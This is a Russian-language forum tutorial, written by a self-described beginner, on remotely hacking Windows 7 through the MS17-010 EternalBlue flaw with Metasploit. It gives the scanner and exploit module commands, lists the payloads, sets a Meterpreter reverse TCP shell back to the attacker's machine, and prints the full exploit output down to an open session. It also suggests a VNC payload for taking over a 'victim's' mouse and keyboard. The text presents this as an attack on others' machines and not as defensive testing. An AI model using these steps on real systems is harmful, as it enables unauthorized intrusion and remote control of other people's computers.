Взлом Windows 7 удалённо без социальной инженерии

[mars0]

Здравствуйте!сегодня Вашему вниманию хочу представить относительно свежий баг в Windows 7 - MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption.

Экстплоит под эту уязвимость уже вышел и Вы можете его найти в своём Metasploit, предварительно введя в консоли msfupdate (если Вы давно не обновляли фреймворк). С помощью сканера auxiliary/scanner/smb/smb_ms17_010 найдите в своей локалке машины, работающие на семёрке. После того, как вы задали диапазон адресов (set RHOSTS 192.168.0.2-254) выберите количество потоков (на Ваше усмотрение): set THREADS 50 , запустите сканер командой run.
Сканер показал нам список хостов на которых имеется данная уязвимость, более того он показал какая именна винда работает на уязвимых машинах.

 

[mars0]

Code:
[+] 192.168.0.26:445      - Host is likely VULNERABLE to MS17-010!  (Windows 5.1)
[+] 192.168.0.13:445      - Host is likely VULNERABLE to MS17-010!  (Windows 7 Ultimate 7601 Service Pack 1)
[+] 192.168.0.29:445      - Host is likely VULNERABLE to MS17-010!  (Windows 7 Ultimate 7601 Service Pack 1)
[+] 192.168.0.21:445      - Host is likely VULNERABLE to MS17-010!  (Windows 7 Professional 7601 Service Pack 1)
[+] 192.168.0.19:445      - Host is likely VULNERABLE to MS17-010!  (Windows 5.1)
[*] Scanned  50 of 253 hosts (19% complete)
[*] Scanned  54 of 253 hosts (21% complete)
[*] Scanned  95 of 253 hosts (37% complete)
[*] Scanned 148 of 253 hosts (58% complete)
[*] Scanned 177 of 253 hosts (69% complete)
[*] Scanned 192 of 253 hosts (75% complete)
[*] Scanned 196 of 253 hosts (77% complete)
[-] 192.168.0.201:445     - Host does NOT appear vulnerable.
[-] 192.168.0.210:445     - Host does NOT appear vulnerable.
[*] Scanned 216 of 253 hosts (85% complete)
[*] Scanned 229 of 253 hosts (90% complete)
[*] Scanned 253 of 253 hosts (100% complete)
[*] Auxiliary module execution completed

Теперь настало время для эксплуатирования уязвымых хостов, введите в консоли Metasploit:

use exploit/windows/smb/ms17_010_eternalblue

Выберите IP адрес уязвимой машины, set RHOST 192.168.0.29 затем введите show payloads. Вы получите список полезных нагрузок, которые эксплоит может передать уязвимой машине:

Code:
   generic/custom                                               normal  Custom Payload
   generic/shell_bind_tcp                                       normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                    normal  Generic Command Shell, Reverse TCP Inline
   windows/x64/exec                                             normal  Windows x64 Execute Command
   windows/x64/loadlibrary                                      normal  Windows x64 LoadLibrary Path
   windows/x64/meterpreter/bind_ipv6_tcp                        normal  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   windows/x64/meterpreter/bind_ipv6_tcp_uuid                   normal  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
   windows/x64/meterpreter/bind_tcp                             normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
   windows/x64/meterpreter/bind_tcp_uuid                        normal  Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
   windows/x64/meterpreter/reverse_http                         normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   windows/x64/meterpreter/reverse_https                        normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   windows/x64/meterpreter/reverse_named_pipe                   normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
   windows/x64/meterpreter/reverse_tcp                          normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
   windows/x64/meterpreter/reverse_tcp_uuid                     normal  Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
   windows/x64/meterpreter/reverse_winhttp                      normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
   windows/x64/meterpreter/reverse_winhttps                     normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
   windows/x64/powershell_bind_tcp                              normal  Windows Interactive Powershell Session, Bind TCP
   windows/x64/powershell_reverse_tcp                           normal  Windows Interactive Powershell Session, Reverse TCP
   windows/x64/shell/bind_ipv6_tcp                              normal  Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
   windows/x64/shell/bind_ipv6_tcp_uuid                         normal  Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
   windows/x64/shell/bind_tcp                                   normal  Windows x64 Command Shell, Windows x64 Bind TCP Stager
   windows/x64/shell/bind_tcp_uuid                              normal  Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
   windows/x64/shell/reverse_tcp                                normal  Windows x64 Command Shell, Windows x64 Reverse TCP Stager
   windows/x64/shell/reverse_tcp_uuid                           normal  Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
   windows/x64/shell_bind_tcp                                   normal  Windows x64 Command Shell, Bind TCP Inline
   windows/x64/shell_reverse_tcp                                normal  Windows x64 Command Shell, Reverse TCP Inline
   windows/x64/vncinject/bind_ipv6_tcp                          normal  Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
   windows/x64/vncinject/bind_ipv6_tcp_uuid                     normal  Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
   windows/x64/vncinject/bind_tcp                               normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
   windows/x64/vncinject/bind_tcp_uuid                          normal  Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
   windows/x64/vncinject/reverse_http                           normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   windows/x64/vncinject/reverse_https                          normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   windows/x64/vncinject/reverse_tcp                            normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
   windows/x64/vncinject/reverse_tcp_uuid                       normal  Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
   windows/x64/vncinject/reverse_winhttp                        normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
   windows/x64/vncinject/reverse_winhttps                       normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)

 

[mars0]

Выберите один из них, например всеми любимый meterpreter командой: set PAYLOAD windows/x64/meterpreter/reverse_tcp
Командой set LHOST 192.168.0.66 введите IP адрес своей машины, после чего введите exploit.

Code:
[*] Started reverse TCP handler on 192.168.0.56:4444
[*] 192.168.0.29:445 - Connecting to target for exploitation.
[+] 192.168.0.29:445 - Connection established for exploitation.
[+] 192.168.0.29:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.29:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.0.29:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.0.29:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.0.29:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1         
[+] 192.168.0.29:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.29:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.29:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.29:445 - Starting non-paged pool grooming
[+] 192.168.0.29:445 - Sending SMBv2 buffers
[+] 192.168.0.29:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.29:445 - Sending final SMBv2 buffers.
[*] 192.168.0.29:445 - Sending last fragment of exploit packet!
[*] 192.168.0.29:445 - Receiving response from exploit packet
[+] 192.168.0.29:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.29:445 - Sending egg to corrupted connection.
[*] 192.168.0.29:445 - Triggering free of corrupted buffer.
[*] Sending stage (205379 bytes) to 192.168.0.29
[*] Meterpreter session 1 opened (192.168.0.56:4444 -> 192.168.0.29:49548) at 2017-11-02 04:57:00 +0000
[+] 192.168.0.29:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.29:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.29:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

Если всё прошло гладко, то Вы увидите текст написанный выше. Открыта сессия Meterpreter, это означает то, что Вы успешно взломали удалённый хост, работающий на Windows 7. Наигравшись с meterpreter, можете заюзать следующий пайлоад: windows/x64/vncinject/reverse_tcp Он позволяет открыть удалённый рабочий стол, а если ввести set ViewOnly false можно управляя мышью и клавиатурой жертвы творить всякие сатанинские вещи с окнами =).
Успехов Вам, во всех начинаниях!!!

P.S. Эта статья писалась новичком для новичков. Гуру, будьте снизходительны.
P.S.S Кстати, Windows 7 Professional не получается скомпрометировать таким образом.